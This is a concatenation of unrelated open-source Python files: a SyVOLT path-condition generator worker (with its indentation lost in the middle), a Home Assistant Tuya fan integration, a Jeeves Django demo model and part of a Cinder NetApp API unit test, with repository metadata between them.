        layer       -- zero-based layer index (used for reporting)
        num         -- worker number; also seeds numpy's RNG for reproducibility
        """
        super(path_condition_generator_worker, self).__init__()
        self.layer_rules = layer_rules
        self.rulesToTreat = rulesToTreat
        self.rulesForSecondPhase = rulesForSecondPhase
        self.layer = layer
        self.num = num
        # The fields below are populated externally by the coordinator before
        # start() is called (see run(), which reads them).
        self.currentPathConditionSet = None
        self.worker_list = None
        self.verbosity = verbosity
        self.rule_names = None
        self.ruleCombinators = None
        self.ruleTraceCheckers = None
        self.overlappingRules = None
        self.subsumption = None
        self.loopingRuleSubsumption = None
        # Deterministic per-worker random stream.
        nprnd.seed(num)
        self.report_progress = report_progress
        self.pruner = pruner
        # Mapping name -> path-condition graph; filled via load_pc_dict().
        self.pc_dict = None
    def load_pc_dict(self, pcs):
        """Wrap *pcs* in a PCDict and install it as this worker's
        name -> path-condition lookup (read and updated by run())."""
        #print("PC length: " + str(len(pcs)))
        self.pc_dict = PCDict(pcs)
def getRuleNamesInPathCondition(self, pcName):
ruleNames = []
for token in pcName.split("_"):
if token == 'E':
pass
else:
rulename = token.split("-")[0]
ruleNames.append(rulename)
return ruleNames
#@do_cprofile
#@profile
def run(self):
#start_time = time.time()
#print("Running thread")
pathConSetLength = len(self.currentPathConditionSet)
newPathConditionSet = []
new_pc_dict = {}
name_dict = {}
reverse_name_dict = {}
progress_bar = None
if self.report_progress:
progress_bar = ProgressBar(pathConSetLength)
pcs_to_prune = []
pcs_to_prune_less = []
for pathConditionIndex in range(pathConSetLength):
pc_name = self.currentPathConditionSet[pathConditionIndex]
if self.report_progress:
progress_bar.update_progress(pathConditionIndex)
pc = self.pc_dict[pc_name]
#store the preds and succs of the pc graph if needed
pc_preds = []
pc_succs = []
childrenPathConditions = [pc_name]
# produce a fresh copy of the path condition in pc_dict, associated with the name of the path condition.
# this frees up the original parent path condition that will not be changed throughout the execution of
# the rules in the layer, while its copy will. This will avoid matching over a rewritten parent path condition.
#self.pc_dict[pc_name] = shrink_graph(deepcopy(pc))
###########################################################################
# Run first phase: run all rules without any overlaps with subsuming rules
###########################################################################
for rule in self.layer_rules:
rule_name = rule.name
if self.verbosity >= 2:
print("--------------------------------------")
print("Treating rule: " + self.rule_names[rule_name])
print("Combining with:")
print("Path Condition:" + pc_name)
#if self.verbosity >= 1:
#print "Layer: " + str(self.layer+1)
#print "Number of Path Conditions generated so far: " + str(len(self.currentPathConditionSet))
#print "Number of Path Conditions Percentage: " + str(int(pathConditionIndex / float(pathConSetLength) * 100))
# calculate if the rule is in a subsuming loop and has a subsuming parent
ruleInLoopAndHasSubsumingParent = False
for loop in self.loopingRuleSubsumption:
if rule_name in loop and loop[0] != rule_name:
ruleInLoopAndHasSubsumingParent = True
# can symbolically execute only if the path condition contains no rule that subsumes
# the rule being executed or rule subsumed by the rule being executed.
# in this way we guarantee that all rules in a partial order get executed
# at least once (when the larger rules don't execute), and overlaps are
# dealt with during the second phase - i.e. all rules that execute and subsume
# others have to get their subsumed rules executed too.
if ruleInLoopAndHasSubsumingParent:
if self.verbosity:
print("Rule is in loop and has subsuming parent, skipping")
continue
subsumingRules = []
if rule_name in self.overlappingRules.keys():
subsumingRules = self.overlappingRules[rule_name]
subsumedRules = []
if rule_name in self.subsumption.keys():
subsumedRules = self.subsumption[rule_name]
# possible cases of rule combination
######################################
# Case 1: Rule has no dependencies
######################################
# the rule is disjointly added to the path condition
if len(self.ruleCombinators[rule_name]) == 1:
if self.verbosity >= 2 : print("Case 1: Rule has no dependencies")
# The rule only gets ran in the first phase if it does not overlap with any other rule.
# check if any of the subsuming rules exists in the path condition
localPathConditionLayerAccumulator = []
for child_pc_index in range(len(childrenPathConditions)):
child_pc_name = childrenPathConditions[child_pc_index]
has_subsuming = any(sRule in child_pc_name for sRule in subsumingRules)
if has_subsuming:
if self.verbosity >= 2:
print("Skipping child: " + child_pc_name + " due to presence of subsuming rule")
continue
has_subsumed = any(sRule in child_pc_name for sRule in subsumedRules)
if has_subsumed:
if self.verbosity >= 2:
print("Skipping child: " + child_pc_name + " due to presence of subsumed rule")
continue
# if not (rule_name in self.overlappingRules.keys() or\
# (rule_name in self.overlappingRules.keys() and subsumedRulesinPC)):
cpc = self.pc_dict[child_pc_name]
#take off the num of nodes in the name
cpc_name = cpc.name.split(".")[0]
new_name = cpc_name + '_' + rule_name + "-"
# create a new path condition which is the result of combining the rule with the current path condition being examined
newPathCond = cpc.copy()
newPathCond = disjoint_model_union(newPathCond,rule)
new_name += "." + str(newPathCond.vcount())
# name the new path condition as the combination of the previous path condition and the rule
newPathCond.name = new_name
if self.pruner.isPathConditionStillFeasible(newPathCond, self.rulesToTreat):
shrunk_newCond = shrink_graph(newPathCond)
self.pc_dict[new_name] = shrunk_newCond
new_pc_dict[new_name] = shrunk_newCond
if self.verbosity >= 2 : print("Created path condition with name: " + newPathCond.name)
localPathConditionLayerAccumulator.append(new_name)
#print_graph(newPathCond)
# store the newly created path condition as a child
childrenPathConditions.append(new_name)
newPathConditionSet.extend(localPathConditionLayerAccumulator)
else:
#########################################################################
# Case 2: Rule has dependencies but cannot execute because
# not all the backward links can be found in the path condition
#########################################################################
# gather the matcher for only the backward links in the rule being combined.
# it is the first matcher (LHS) of the combinators in the list.
ruleBackwardLinksMatcher = self.ruleTraceCheckers[rule_name]
# check if the backward links cannot be found by matching them on the path condition
# if not pc_preds or not pc_succs:
# pc_preds, pc_succs = get_preds_and_succs(pc)
#pc_preds = [(len(tmp), tmp) for tmp in pc.get_adjlist(mode=2)]
#pc_succs = [(len(tmp), tmp) for tmp in pc.get_adjlist(mode=1)]
p = Packet()
p.graph = pc
ruleBackwardLinksMatcher.packet_in(p, preds=pc_preds, succs=pc_succs)
if not ruleBackwardLinksMatcher.is_success:
if self.verbosity >= 2 : print("Case 2: Rule has dependencies but cannot execute")
else:
#graph_to_dot(pc.name + "_par", pc)
#########################################################################
# Case 3: Rule has dependencies that may or will execute
#########################################################################
if self.verbosity >= 2 : print("Case 3: Rule has dependencies that may or will execute")
# go through the partial and the total rule combinators
for combinator in range(2):
combinatorMatcher = self.ruleCombinators[rule_name][combinator][0]
if self.verbosity >= 2 : print("Combinator: " + combinatorMatcher.condition.name)
# check whether we are dealing with a partial or a total combinator
isTotalCombinator = False
#if combinator == len(self.ruleCombinators[rule_name]) - 1:
if combinator == 1:
isTotalCombinator = True
# find all the matches of the rule combinator in the path condition that the rule combines with
p = Packet()
p.graph = pc
#print_graph(p.graph)
combinatorMatcher.packet_in(p, preds=pc_preds, succs=pc_succs)
# if self.rule_names[rule.name] == "HereferenceOUTeTypeSolveRefEReferenceEClassifierEReferenceEClassifier":
# graph_to_dot("pathCondition_par_" + pc.name, pc)
#graph_to_dot("combinator_par_" + combinatorMatcher.condition.name, combinatorMatcher.condition)
#print_graph(combinatorMatcher.condition)
#print_graph(pc)
# now go through the path conditions resulting from combination of the rule and the
# path condition from the previous layer currently being treated in order to apply
# the combinator's RHS to every possibility of match of the combinator's LHS
if self.verbosity >= 2 :
if combinatorMatcher.is_success:
print("Matching was successful")
else:
print("Matching was not successful")
if combinatorMatcher.is_success:
# holds the result of combining the path conditions generated so far when combining
# the rule with the path condition using the multiple combinators
partialTotalPathCondLayerAccumulator = []
# now combine the rule with the newly created path condition using the current combinator
# in all the places where the rule matched on top of the path condition
i = Iterator()
#p_copy = deepcopy(p)
#p_copy = i.packet_in(p_copy)
p = i.packet_in(p)
#
# pathCondSubnum = 0
#
# while i.is_success and pathCondSubnum < 1:
#go through all the children of this path condition
for child_pc_index in range(len(childrenPathConditions)):
#get the name of the child
child_pc_name = childrenPathConditions[child_pc_index]
has_subsuming = any(sRule in child_pc_name for sRule in subsumingRules)
if has_subsuming:
if self.verbosity >= 2:
print("Skipping child: " + child_pc_name + " due to presence of subsuming rule")
continue
has_subsumed = any(sRule in child_pc_name for sRule in subsumedRules)
if has_subsumed:
if self.verbosity >= 2:
print("Skipping child: " + child_pc_name + " due to presence of subsumed rule")
continue
if self.verbosity >= 2 :
print("--> Combining with path condition: " + child_pc_name)
# # only combine if the rule hasn't executed yet on that path condition
#
# # get all the rule names in the name of the rule being executed (can be merged with subsumed rules).
# # also get the rule names of all rules already present in the path condition
# ruleNamesInRule = rule.name.split("_")
# ruleNamesInPC = child_pc_name.split("_")
# # cleanup the dashes from the rule names in the path condition
# for nameIndex in range(len(ruleNamesInPC)):
# ruleNamesInPC[nameIndex] = ruleNamesInPC[nameIndex].split("-")[0]
#get the path condition from the dictionary
cpc = self.pc_dict[child_pc_name]
# if the combinator is not the total one, make a copy of the path condition in the set
# of combinations generated so far.
# the total combinator is always the one at the end of the combinator list for the rule.
# name the new path condition as the combination of the previous path condition and the rule
newPathCondName = cpc.name.split(".")[0] + "_" + rule.name
p_copy = deepcopy(p)
newPathCond = cpc.copy()
p_copy.graph = newPathCond
rewriter = self.ruleCombinators[rule.name][combinator][1]
p_copy = rewriter.packet_in(p_copy)
newPathCond = p_copy.graph
# check if the equations on the attributes of the newly created path condition are satisfied
#if not is_consistent(newPathCond):
if not rewriter.is_success:
if self.verbosity >= 2:
print("Path Condition: " + newPathCondName + " has inconsistent equations")
# elif not self.pruner.isPathConditionStillFeasible(newPathCond,
# rulesToTreat):
# if self.verbosity >= 2:
# print("Path Condition: " + newPathCondName + " was pruned")
else:
valid = True
if isTotalCombinator:
#print("Going to write a total: " + newPathCondName)
newPathCondName = newPathCondName +"-T"# + str(pathCondSubnum)
newPathCondName += "." + str(len(newPathCond.vs))
newPathCond.name = newPathCondName
if not self.pruner.isPathConditionStillFeasible(
newPathCond, self.rulesToTreat):
valid = False
if self.verbosity >= 2:
print("Total: Possible PC: " + newPathCondName + " valid?: " + str(valid))
# because the rule combines totally with a path condition in the accumulator we just copy it
# directly on top of the accumulated path condition
# several totals my exist, so the original PC may be rewritten multiple times
# previousTotalPC = None
# writeOverPreviousTotalPC = False
if valid:
try:
reverse_name = reverse_name_dict[cpc.name]
name_dict[reverse_name] = newPathCondName
reverse_name_dict[newPathCondName] = reverse_name
except KeyError:
name_dict[cpc.name] = newPathCondName
reverse_name_dict[newPathCondName] = cpc.name
#prune the old path condition
pcs_to_prune.append(childrenPathConditions[child_pc_index])
pcs_to_prune_less.append(childrenPathConditions[child_pc_index])
#change the child's name in the child's array
childrenPathConditions[child_pc_index] = newPathCondName
else:
#print("Going to write a partial: " + newPathCondName)
newPathCondName = newPathCondName +"-P"# + str(pathCondSubnum)
newPathCondName += "." + str(len(newPathCond.vs))
newPathCond.name = newPathCondName
# we are dealing with a partial combination of the rule.
# create a copy of the path condition in the accumulator because this match of the rule is partial.
if not self.pruner.isPathConditionStillFeasible(
newPathCond, self.rulesToTreat):
valid = False
else:
# add the result to the local accumulator
partialTotalPathCondLayerAccumulator.append(newPathCond.name)
if self.verbosity >= 2:
print("Partial: Possible PC: " + newPathCondName + " valid?: " + str(valid))
# store the parent of the newly created path condition
childrenPathConditions.append(newPathCond.name)
if self.verbosity >= 2:
print("Created path condition with name: " + newPathCondName)
# store the new path condition
shrunk_newCond = shrink_graph(newPathCond)
self.pc_dict[newPathCondName] = shrunk_newCond
if valid:
new_pc_dict[newPathCondName] = shrunk_newCond
else:
pcs_to_prune.append(newPathCondName)
#p = i.next_in(p)
#pathCondSubnum += 1
newPathConditionSet.extend(partialTotalPathCondLayerAccumulator)
###########################################################################
# Run second phase: run all rules with any overlaps with subsuming rules on
# path conditions generated during the first phase
###########################################################################
# print("--------------------------------")
# print("overlapping rules: " + str(self.overlappingRules.keys()))
# print("rules in layer: " + str(ruleNamesInLayer))
# print("Rules for second phase: " + str(rulesForSecondPhase))
for pathConditionIndex2 in range(len(childrenPathConditions)):
for rule_name in self.rulesForSecondPhase:
ruleNamesInPC = []
for token in childrenPathConditions[pathConditionIndex2].split("_"):
ruleNamesInPC.append(token.split("-")[0])
# print("Rule names in PC: " + str(ruleNamesInPC))
# print("Overlaps looked for: " + str(self.overlappingRules[rule_name]))
# print("Intersection: " + str(set(self.overlappingRules[rule_name]).intersection(set(ruleNamesInPC))))
# check if any of the subsuming rules exists in the path condition's name,
# otherwise don't even try to apply the rule.
# check also if the rules has not been previously executed as a rule with no dependencies
if set(self.overlappingRules[rule_name]).intersection(set(ruleNamesInPC)) != set() and\
rule_name not in childrenPathConditions[pathConditionIndex2]:
if self.verbosity >= 2 : print("Executing rule " + self.rule_names[rule_name] + " in second phase for overlaps.")
#combinatorMatcher = None
#combinatorRewriter = None
if len(self.ruleCombinators[rule_name]) == 1:
# Case 1: Rule has no dependencies
combinatorMatcher = self.ruleCombinators[rule_name][0][0]
combinatorRewriter = self.ruleCombinators[rule_name][0][1]
else:
# Case 3: Rule has dependencies that may or will execute
combinatorMatcher = self.ruleCombinators[rule_name][2][0]
combinatorRewriter = self.ruleCombinators[rule_name][2][1]
# execute the rule
p = Packet()
cpc = self.pc_dict[childrenPathConditions[pathConditionIndex2]]
p.graph = cpc
p = combinatorMatcher.packet_in(p)
# print "----> PC Name: " + childrenPathConditions[pathConditionIndex]
#print ("-----------------------------> Match: " + str(combinatorMatcher.is_success))
i = Iterator()
p = i.packet_in(p)
# print "Match site:"
# for matchSite in p.match_sets.keys():
# print str(p.match_sets[matchSite])
numOfOverlaps = 0
while i.is_success:
numOfOverlaps = numOfOverlaps + 1
beforeOverlappingPC = p.graph.copy()
p = combinatorRewriter.packet_in(p)
if not combinatorRewriter.is_success:
if self.verbosity >= 2:
print("Graph: " + p.graph.name + " has inconsistent equations")
p.graph = beforeOverlappingPC
#print("--------------------------------> Rewrite: " + str(combinatorRewriter.is_success))
p = i.next_in(p)
newPathCond = p.graph
newPathCondName = cpc.name.split(".")[0] + "_" + rule_name + "-OVER" + str(numOfOverlaps)
newPathCondName += "." + str(len(newPathCond.vs))
# replace the original path condition by the result of overlapping the subsumed rule on it
# previousTotalPC = None
# writeOverPreviousTotalPC = False
try:
reverse_name = reverse_name_dict[cpc.name]
if reverse_name in name_dict:
pcs_to_prune.append(name_dict[reverse_name])
name_dict[reverse_name] = newPathCondName
reverse_name_dict[newPathCondName] = reverse_name
except KeyError:
name_dict[cpc.name] = newPathCondName
reverse_name_dict[newPathCondName] = cpc.name
# for nameTotalPC in name_dict.keys():
# if name_dict[nameTotalPC] == cpc.name:
# previousTotalPC = nameTotalPC
# writeOverPreviousTotalPC = True
# break
#
# if not writeOverPreviousTotalPC:
# name_dict[cpc.name] = newPathCondName
# reverse_name_dict[newPathCondName] = cpc.name
# else:
# name_dict[previousTotalPC] = newPathCondName
# reverse_name_dict[newPathCondName] = previousTotalPC
childrenPathConditions[pathConditionIndex2] = newPathCondName
if self.verbosity >= 2:
print("Second Phase: Created new path condition: " + newPathCondName)
newPathCond.name = newPathCondName
shrunk_pc = shrink_graph(newPathCond)
self.pc_dict[newPathCondName] = shrunk_pc
new_pc_dict[newPathCondName] = shrunk_pc
if not self.pruner.isPathConditionStillFeasible(pc, self.rulesToTreat):
pcs_to_prune.append(pc_name)
#print("Current length: " + str(len(self.currentPathConditionSet)))
#print("New length: " + str(len(newPathConditionSet)))
self.currentPathConditionSet = list(set(self.currentPathConditionSet))
pruning_debug = False
if self.pruner.do_pruning:
#pruning_time = time.time()
for pathCondName in pcs_to_prune:
#print("Pruning: " + pathCondName)
#
try:
del self.pc_dict[pathCondName]
if pruning_debug:
print("Pruned from new pc dict: " + pathCondName)
except KeyError:
pass
delete_graph(pathCondName)
try:
del new_pc_dict[pathCondName]
if pruning_debug:
print("Pruned from new pc dict: " + pathCondName)
except KeyError:
pass
# work around bug
if pathCondName not in pcs_to_prune_less:
try:
newPathConditionSet.remove(pathCondName)
if pruning_debug:
print("Pruned from new path cond set: " + pathCondName)
except ValueError:
pass
if pathCondName not in name_dict:
try:
self.currentPathConditionSet.remove(pathCondName)
if pruning_debug:
print("Pruned from set: " + pathCondName)
except ValueError:
pass
# else:
# del name_dict[pathCondName]
# try:
# #delete_graph(name_dict[pathCondName])
# print("Removing: " + name_dict[pathCondName])
# #del name_dict[pathCondName]
# except KeyError:
# pass
# for key, value in dict.copy(name_dict).items():
# if pathCondName == value:
# del name_dict[key]
#print("Time taken for pruning: " + str(time.time() - pruning_time))
self.currentPathConditionSet.extend(newPathConditionSet)
self.currentPathConditionSet = list(set(self.currentPathConditionSet))
# print("currentPathConditionSet: " + str(self.currentPathConditionSet))
# print("new_pc_dict: " + str(new_pc_dict.keys()))
# print("name_dict: " + str(name_dict.keys()))
if self.pruner.do_pruning:
self.pruner.print_results()
#print(asizeof.asized(self, detail = 2).format())
#print("Thread finished: Took " + str(time.time() - start_time) + " seconds")
self.worker_list[0] = self.currentPathConditionSet
self.worker_list[1] = new_pc_dict
self.worker_list[2] = name_dict
| {
"content_hash": "df837feab69b51a87918580ef739f88f",
"timestamp": "",
"source": "github",
"line_count": 707,
"max_line_length": 154,
"avg_line_length": 47.001414427157,
"alnum_prop": 0.45428829371050256,
"repo_name": "levilucio/SyVOLT",
"id": "6ae650c025a6ccf00bd32265f246f7e3529dfcf9",
"size": "33231",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "path_condition_generator_worker.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "166159"
},
{
"name": "Python",
"bytes": "34207588"
},
{
"name": "Shell",
"bytes": "1118"
}
],
"symlink_target": ""
} |
"""Support for Tuya Fan."""
from __future__ import annotations
from typing import Any
from tuya_iot import TuyaDevice, TuyaDeviceManager
from homeassistant.components.fan import (
DIRECTION_FORWARD,
DIRECTION_REVERSE,
FanEntity,
FanEntityFeature,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import HomeAssistant, callback
from homeassistant.helpers.dispatcher import async_dispatcher_connect
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.util.percentage import (
ordered_list_item_to_percentage,
percentage_to_ordered_list_item,
)
from . import HomeAssistantTuyaData
from .base import EnumTypeData, IntegerTypeData, TuyaEntity
from .const import DOMAIN, TUYA_DISCOVERY_NEW, DPCode, DPType
# Tuya device categories that this platform exposes as Home Assistant fans.
TUYA_SUPPORT_TYPE = {
    "fs",  # Fan
    "fsd",  # Fan with Light
    "fskg",  # Fan wall switch
    "kj",  # Air Purifier
}
async def async_setup_entry(
    hass: HomeAssistant, entry: ConfigEntry, async_add_entities: AddEntitiesCallback
) -> None:
    """Set up tuya fan dynamically through tuya discovery."""
    hass_data: HomeAssistantTuyaData = hass.data[DOMAIN][entry.entry_id]

    @callback
    def async_discover_device(device_ids: list[str]) -> None:
        """Discover and add a discovered tuya fan."""
        device_map = hass_data.device_manager.device_map
        discovered = [
            TuyaFanEntity(device, hass_data.device_manager)
            for device in (device_map[device_id] for device_id in device_ids)
            if device and device.category in TUYA_SUPPORT_TYPE
        ]
        async_add_entities(discovered)

    # Register already-known devices, then listen for future discoveries.
    async_discover_device([*hass_data.device_manager.device_map])
    entry.async_on_unload(
        async_dispatcher_connect(hass, TUYA_DISCOVERY_NEW, async_discover_device)
    )
class TuyaFanEntity(TuyaEntity, FanEntity):
    """Tuya Fan Device.

    Capabilities are discovered at construction time from the device's
    datapoints (DP codes): the attributes below stay ``None`` when the
    device does not expose the corresponding function.
    """

    _direction: EnumTypeData | None = None
    _oscillate: DPCode | None = None
    _presets: EnumTypeData | None = None
    _speed: IntegerTypeData | None = None
    _speeds: EnumTypeData | None = None
    _switch: DPCode | None = None

    def __init__(
        self,
        device: TuyaDevice,
        device_manager: TuyaDeviceManager,
    ) -> None:
        """Init Tuya Fan Device."""
        super().__init__(device, device_manager)

        self._switch = self.find_dpcode(
            (DPCode.SWITCH_FAN, DPCode.SWITCH), prefer_function=True
        )

        self._attr_preset_modes = []
        if enum_type := self.find_dpcode(
            (DPCode.FAN_MODE, DPCode.MODE), dptype=DPType.ENUM, prefer_function=True
        ):
            self._presets = enum_type
            self._attr_supported_features |= FanEntityFeature.PRESET_MODE
            self._attr_preset_modes = enum_type.range

        # Find speed controls, can be either percentage (integer DP) or a
        # fixed set of named speeds (enum DP). Integer takes precedence.
        dpcodes = (
            DPCode.FAN_SPEED_PERCENT,
            DPCode.FAN_SPEED,
            DPCode.SPEED,
            DPCode.FAN_SPEED_ENUM,
        )
        if int_type := self.find_dpcode(
            dpcodes, dptype=DPType.INTEGER, prefer_function=True
        ):
            self._attr_supported_features |= FanEntityFeature.SET_SPEED
            self._speed = int_type
        elif enum_type := self.find_dpcode(
            dpcodes, dptype=DPType.ENUM, prefer_function=True
        ):
            self._attr_supported_features |= FanEntityFeature.SET_SPEED
            self._speeds = enum_type

        if dpcode := self.find_dpcode(
            (DPCode.SWITCH_HORIZONTAL, DPCode.SWITCH_VERTICAL), prefer_function=True
        ):
            self._oscillate = dpcode
            self._attr_supported_features |= FanEntityFeature.OSCILLATE

        if enum_type := self.find_dpcode(
            DPCode.FAN_DIRECTION, dptype=DPType.ENUM, prefer_function=True
        ):
            self._direction = enum_type
            self._attr_supported_features |= FanEntityFeature.DIRECTION

    def set_preset_mode(self, preset_mode: str) -> None:
        """Set the preset mode of the fan."""
        if self._presets is None:
            return
        self._send_command([{"code": self._presets.dpcode, "value": preset_mode}])

    def set_direction(self, direction: str) -> None:
        """Set the direction of the fan."""
        if self._direction is None:
            return
        self._send_command([{"code": self._direction.dpcode, "value": direction}])

    def set_percentage(self, percentage: int) -> None:
        """Set the speed of the fan, as a percentage (1-100)."""
        if self._speed is not None:
            self._send_command(
                [
                    {
                        "code": self._speed.dpcode,
                        # Remap HA's 1-100 scale onto the DP's native range.
                        "value": int(self._speed.remap_value_from(percentage, 1, 100)),
                    }
                ]
            )
            return

        if self._speeds is not None:
            self._send_command(
                [
                    {
                        "code": self._speeds.dpcode,
                        "value": percentage_to_ordered_list_item(
                            self._speeds.range, percentage
                        ),
                    }
                ]
            )

    def turn_off(self, **kwargs: Any) -> None:
        """Turn the fan off."""
        self._send_command([{"code": self._switch, "value": False}])

    def turn_on(
        self,
        percentage: int | None = None,
        preset_mode: str | None = None,
        **kwargs: Any,
    ) -> None:
        """Turn on the fan, optionally at a given speed and/or preset.

        All requested changes are batched into a single command list so
        the device receives one request.
        """
        if self._switch is None:
            return

        commands: list[dict[str, str | bool | int]] = [
            {"code": self._switch, "value": True}
        ]

        # BUGFIX: a stray ``return`` used to follow this append, so the
        # assembled commands (including the switch-on itself) were never
        # sent when a percentage was requested on an integer-speed fan.
        if percentage is not None and self._speed is not None:
            commands.append(
                {
                    "code": self._speed.dpcode,
                    "value": int(self._speed.remap_value_from(percentage, 1, 100)),
                }
            )

        if percentage is not None and self._speeds is not None:
            commands.append(
                {
                    "code": self._speeds.dpcode,
                    "value": percentage_to_ordered_list_item(
                        self._speeds.range, percentage
                    ),
                }
            )

        if preset_mode is not None and self._presets is not None:
            commands.append({"code": self._presets.dpcode, "value": preset_mode})

        self._send_command(commands)

    def oscillate(self, oscillating: bool) -> None:
        """Oscillate the fan."""
        if self._oscillate is None:
            return
        self._send_command([{"code": self._oscillate, "value": oscillating}])

    @property
    def is_on(self) -> bool | None:
        """Return true if fan is on; None when no switch DP is known."""
        if self._switch is None:
            return None
        return self.device.status.get(self._switch)

    @property
    def current_direction(self) -> str | None:
        """Return the current direction of the fan."""
        if (
            self._direction is None
            or (value := self.device.status.get(self._direction.dpcode)) is None
        ):
            return None

        if value.lower() == DIRECTION_FORWARD:
            return DIRECTION_FORWARD

        if value.lower() == DIRECTION_REVERSE:
            return DIRECTION_REVERSE

        return None

    @property
    def oscillating(self) -> bool | None:
        """Return true if the fan is oscillating."""
        if self._oscillate is None:
            return None
        return self.device.status.get(self._oscillate)

    @property
    def preset_mode(self) -> str | None:
        """Return the current preset_mode."""
        if self._presets is None:
            return None
        return self.device.status.get(self._presets.dpcode)

    @property
    def percentage(self) -> int | None:
        """Return the current speed as a 1-100 percentage."""
        if self._speed is not None:
            if (value := self.device.status.get(self._speed.dpcode)) is None:
                return None
            return int(self._speed.remap_value_to(value, 1, 100))

        if self._speeds is not None:
            if (value := self.device.status.get(self._speeds.dpcode)) is None:
                return None
            return ordered_list_item_to_percentage(self._speeds.range, value)

        return None

    @property
    def speed_count(self) -> int:
        """Return the number of speeds the fan supports."""
        if self._speeds is not None:
            return len(self._speeds.range)
        return 100
| {
"content_hash": "363c7fec0880c150c082570b1f47f2f5",
"timestamp": "",
"source": "github",
"line_count": 261,
"max_line_length": 87,
"avg_line_length": 33.13026819923372,
"alnum_prop": 0.5716433445125477,
"repo_name": "toddeye/home-assistant",
"id": "2d16ed36d404bda99ff49f22296301365a6e42fa",
"size": "8647",
"binary": false,
"copies": "1",
"ref": "refs/heads/dev",
"path": "homeassistant/components/tuya/fan.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "3005"
},
{
"name": "PLSQL",
"bytes": "840"
},
{
"name": "Python",
"bytes": "47414832"
},
{
"name": "Shell",
"bytes": "6252"
}
],
"symlink_target": ""
} |
from django.db.models import CharField
from jeevesdb.JeevesModel import JeevesModel as Model, JeevesForeignKey as ForeignKey
from sourcetrans.macro_module import macros, jeeves
from jeevesdb.JeevesModel import label_for
import JeevesLib
# An example model.
# Right now self-reference is either impossible or difficult because JeevesForeignKey
# only supports a model class (not a string) as the related object. (TODO fix this.)
class UserProfile(Model):
    """Minimal user account model: a username and an email address."""
    username = CharField(max_length=1024)
    email = CharField(max_length=1024)
class Address(Model):
    """A postal address reduced to its 5-character ZIP code."""
    zipcode=CharField(max_length=5)
    def String(self):
        """Return the raw zipcode string."""
        return self.zipcode
class Individual(Model):
    """A person with a confidential address.

    The ``jeeves_*`` hooks below implement the Jeeves faceted-value
    protocol for the ``address`` field: a policy function and a
    low-confidentiality replacement value.
    """
    address = ForeignKey(Address, blank=True, null = True)
    def Address(self):
        """Return the (possibly faceted) address value."""
        return self.address
    @staticmethod
    def jeeves_get_private_address(individual):
        """Build the redacted facet: zip code with the last 3 digits masked.

        NOTE(review): creates a new Address row on every call — presumably
        intentional for this demo, but verify it doesn't pollute the table.
        """
        restrictedAddress=Address.objects.create(zipcode=individual.address.zipcode[:2]+"***")
        return restrictedAddress
    @staticmethod
    @label_for('address')
    @jeeves
    def jeeves_restrict_Individuallabel(individual, ctxt):
        """Policy for the 'address' label: always deny (show redacted facet)."""
        return False
from django.dispatch import receiver
from django.db.models.signals import post_syncdb
import sys
# Handle to this very module, used as the post_syncdb ``sender`` filter below.
current_module = sys.modules[__name__]
@receiver(post_syncdb, sender=current_module)
def dbSynced(sender, **kwargs):
    """Seed the freshly synced database with sample data.

    Uses Python 2's ``execfile``; the script runs in this function's scope.
    """
    execfile("sampleData.py")
| {
"content_hash": "5df57445c2c11a152a7e22320d6ac29c",
"timestamp": "",
"source": "github",
"line_count": 41,
"max_line_length": 88,
"avg_line_length": 31.585365853658537,
"alnum_prop": 0.7837837837837838,
"repo_name": "BambooL/jeeves",
"id": "f1ef19d7966c58c003a2f7e31532df332c615627",
"size": "1295",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "demo/tests/foreignkey2Parent/jelf/models.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "24672"
},
{
"name": "HTML",
"bytes": "183277"
},
{
"name": "JavaScript",
"bytes": "81040"
},
{
"name": "Makefile",
"bytes": "9025"
},
{
"name": "Python",
"bytes": "673325"
},
{
"name": "Shell",
"bytes": "110"
}
],
"symlink_target": ""
} |
"""
Tests for NetApp API layer
"""
from cinder.i18n import _
from cinder import test
from cinder.volume.drivers.netapp.dataontap.client import api as netapp_api
class NetAppApiElementTransTests(test.TestCase):
"""Test case for NetApp API element translations."""
def setUp(self):
super(NetAppApiElementTransTests, self).setUp()
def test_translate_struct_dict_unique_key(self):
"""Tests if dict gets properly converted to NaElements."""
root = netapp_api.NaElement('root')
child = {'e1': 'v1', 'e2': 'v2', 'e3': 'v3'}
root.translate_struct(child)
self.assertEqual(3, len(root.get_children()))
self.assertEqual('v1', root.get_child_content('e1'))
self.assertEqual('v2', root.get_child_content('e2'))
self.assertEqual('v3', root.get_child_content('e3'))
def test_translate_struct_dict_nonunique_key(self):
"""Tests if list/dict gets properly converted to NaElements."""
root = netapp_api.NaElement('root')
child = [{'e1': 'v1', 'e2': 'v2'}, {'e1': 'v3'}]
root.translate_struct(child)
self.assertEqual(3, len(root.get_children()))
children = root.get_children()
for c in children:
if c.get_name() == 'e1':
self.assertIn(c.get_content(), ['v1', 'v3'])
else:
self.assertEqual('v2', c.get_content())
def test_translate_struct_list(self):
"""Tests if list gets properly converted to NaElements."""
root = netapp_api.NaElement('root')
child = ['e1', 'e2']
root.translate_struct(child)
self.assertEqual(2, len(root.get_children()))
self.assertIsNone(root.get_child_content('e1'))
self.assertIsNone(root.get_child_content('e2'))
def test_translate_struct_tuple(self):
"""Tests if tuple gets properly converted to NaElements."""
root = netapp_api.NaElement('root')
child = ('e1', 'e2')
root.translate_struct(child)
self.assertEqual(2, len(root.get_children()))
self.assertIsNone(root.get_child_content('e1'))
self.assertIsNone(root.get_child_content('e2'))
def test_translate_invalid_struct(self):
"""Tests if invalid data structure raises exception."""
root = netapp_api.NaElement('root')
child = 'random child element'
self.assertRaises(ValueError, root.translate_struct, child)
def test_setter_builtin_types(self):
"""Tests str, int, float get converted to NaElement."""
root = netapp_api.NaElement('root')
root['e1'] = 'v1'
root['e2'] = 1
root['e3'] = 2.0
root['e4'] = 8l
self.assertEqual(4, len(root.get_children()))
self.assertEqual('v1', root.get_child_content('e1'))
self.assertEqual('1', root.get_child_content('e2'))
self.assertEqual('2.0', root.get_child_content('e3'))
self.assertEqual('8', root.get_child_content('e4'))
def test_setter_na_element(self):
"""Tests na_element gets appended as child."""
root = netapp_api.NaElement('root')
root['e1'] = netapp_api.NaElement('nested')
